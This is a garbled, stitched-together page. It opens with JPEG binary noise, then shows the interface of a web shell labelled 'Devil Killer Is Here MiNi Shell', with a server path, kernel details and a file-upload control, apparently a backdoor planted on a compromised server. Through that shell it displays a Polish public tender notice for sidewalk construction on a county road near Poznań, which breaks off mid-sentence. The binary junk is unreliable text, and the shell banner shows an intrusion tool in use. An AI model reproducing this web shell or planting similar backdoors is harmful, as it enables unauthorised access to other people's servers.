JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210624/0009238801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00092388 z dnia 2021-06-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa chodnika w ciągu drogi powiatowej nr 2456P Tomiczki – granica powiatu w m. Słupia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W POZNANIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631281080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zielona 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-851</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">618593430</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">618593429</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zdp.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zdp.poznan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa chodnika w ciągu drogi powiatowej nr 2456P Tomiczki – granica powiatu w m. Słupia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-17ad2618-d4b3-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00092388</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000654/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.21 Budowa chodnika w ciągu drogi powiatowej 2456P Tomiczki - granica wm. Słupia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_poznan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest<br/>w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/zdp_poznan</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego”. Za<br/>datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich<br/>przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do<br/>Zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>Komunikacja poprzez „Wyślij wiadomość” umożliwia dodanie do treści wysyłanej wiadomości plików lub<br/>spakowanego katalogu (załączników).<br/>2. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. W<br/>przypadku rozbieżności pomiędzy treścią niniejszej SWZ a treścią udzielonych odpowiedzi, jako<br/>obowiązującą należy przyjąć treść pisma zawierającego późniejsze oświadczenie Zamawiającego.<br/>3. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do<br/>konkretnego Wykonawcy.<br/>4. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 roku w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>3)zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>4)włączona obsługa JavaScript,<br/>5)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie<br/>UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>5. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się<br/>w zakładce „Instrukcje dla<br/>Wykonawców" na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>6. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>7. W postępowaniu o udzielenie niniejszego zamówienia, wszystkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, w tym także zapytania i wyjaśnienia dot. SWZ Zamawiający i<br/>Wykonawcy przekazują pisemnie za wyjątkiem oferty, oświadczeń i dokumentów wymienionych w<br/>Rozdziale VIII SWZ, które składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna zawarta w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna zawarta w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZ.261.2.23.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia publicznego jest: Budowa chodnika w ciągu drogi powiatowej nr<br/>2456P Tomiczki-granica powiatu w m. Słupia.<br/>2. Roboty należy wykonać na podstawie dokumentacji projektowej opracowanej przez: KFG Sp.<br/>z o.o., sp.k, Biuro Projektów ul. Wilczak 15 , 61-851 Poznań.<br/>3. Zakres robót objętych zamówieniem obejmuje w szczególności:<br/>1) wykonanie robót ziemnych<br/>2) wykonanie poszerzenia nawierzchni drogi<br/>3) ułożenie obrzeży i krawężników na ławie betonowej<br/>4) wykonanie podbudowy pod chodnikiem<br/>5) nawierzchnia z kostki betonowej<br/>6) budowa energetycznej linii kablowej<br/>7) montaż latarni<br/>8) budowa kanału technologicznego<br/>9) wprowadzenie stałej organizacji ruchu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wskazane w treści SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat*, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie dwie roboty budowlane<br/>obejmujące swym zakresem budowę/rozbudowę/przebudowę lub remont drogi lub ulicy o<br/>nawierzchni bitumicznej o wartości nie mniejszej niż 800 000,00 PLN brutto każda (remont<br/>cząstkowy masą bitumiczna nie będzie potwierdzał spełnienia powyższego warunku).<br/>*okresy wyrażone w latach liczy się wstecz od dnia w którym upływa termin składnia ofert<br/>b) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował<br/>następującymi osobami:<br/>Kierownik budowy – osoba posiadająca uprawnienia budowlane w specjalności drogowej bez<br/>ograniczeń, lub odpowiadające im ważne uprawnienia budowlane wydane w świetle<br/>obowiązujących przepisów prawa, umożliwiające realizację przedmiotu zamówienia, co najmniej<br/>2-letnie doświadczenie (licząc od dnia uzyskania uprawnień) na stanowisku kierownika budowy<br/>lub kierownika robót drogowych, w tym pełnił funkcję kierownika budowy lub kierownika robót<br/>drogowych nad minimum jedną ukończoną robotą budowlaną obejmującą<br/>budowę/rozbudowę/przebudowę lub remont drogi lub ulicy o nawierzchni bitumicznej o wartości<br/>nie mniejszej niż 0,8 mln zł brutto (remont cząstkowy masą bitumiczna nie będzie potwierdzał<br/>spełnienia powyższego warunku).<br/>Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których<br/>mowa w ustawie z dnia 7 lipca 1994 roku Prawo budowlane (t. j.: Dz. U. z 2020 r., poz. 1333 ze<br/>zmianami) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie<br/>uprzednio obowiązujących przepisów prawa, Zamawiający uzna również wymagane<br/>uprawnienia budowlane do kierowania robotami budowlanymi nabyte w innych niż<br/>Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich<br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronach umowy o Europejskim<br/>Obszarze Gospodarczym, Konfederacji Szwajcarskiej, na zasadach określonych w ustawie z<br/>dnia 22 grudnia 2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (t. j.: Dz. U. z 2020 r., poz. 220 ze zmianami).<br/>c) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował łącznie<br/>minimum:<br/>- samochód ciężarowy -samowyładowczy – 1 szt.,<br/>- zagęszczarka wibracyjna – 2 szt.,<br/>- walec stalowy – 1 szt., <br/>- koparko - ładowarka – 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia,<br/>następujących podmiotowych środków dowodowych:<br/>1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, o których mowa w ust. 1 pkt 1 - składa dokument lub dokumenty<br/>wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że:<br/>1) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury.<br/>3. Dokumenty, o których mowa w ust. 2, powinny być wystawione nie wcześniej niż 3 miesiące przed<br/>ich złożeniem.<br/>4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 2, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania Wykonawcy, z zastrzeżeniem terminów, o których mowa w ust. 3.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 roku o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp dane umożliwiające dostęp do tych środków</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wzywa Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,<br/>miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 7 do SWZ. Jeżeli<br/>Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z<br/>innymi Wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu Wykonawca ten<br/>bezpośrednio uczestniczył.<br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 8 do<br/>SWZ.<br/>3) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>Wykonawca opisuje każdy sprzęt w taki sposób, aby można było go zidentyfikować na podstawie cech<br/>szczególnych, np.: nr seryjny - załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca sporządza ofertę na formularzu ofertowym stanowiącym załącznik nr 1 do SWZ<br/>dołączając kosztorys ofertowy, będący nierozłącznym elementem formularza ofertowego,<br/>stanowiący załącznik nr 2 do SWZ. Ponadto wraz z ofertą Wykonawca składa:<br/>1) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania,<br/>2) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu,<br/>3) Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów,<br/>4) Pełnomocnictwo, jeżeli zachodzą okoliczności, o których mowa w ust. 4,<br/>5) Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu z<br/>postępowania (jeśli dotyczy),<br/>6) Oświadczenie podmiotu udostępniającego zasoby o spełnianiu warunków udziału w<br/>postępowaniu (jeśli dotyczy),<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>8) Oryginał gwarancji lub poręczenia, jeżeli wadium wnoszone jest w innej formie niż pieniądz.<br/>3. Oferta wraz z załącznikami winna być podpisana przez osobę/y umocowaną/e do<br/>reprezentowania Wykonawcy.<br/>4. Jeżeli w imieniu Wykonawcy/podmiotu udostępniającego zasoby na zasadach określonych w<br/>art. 118 ustawy Pzp działa osoba, której 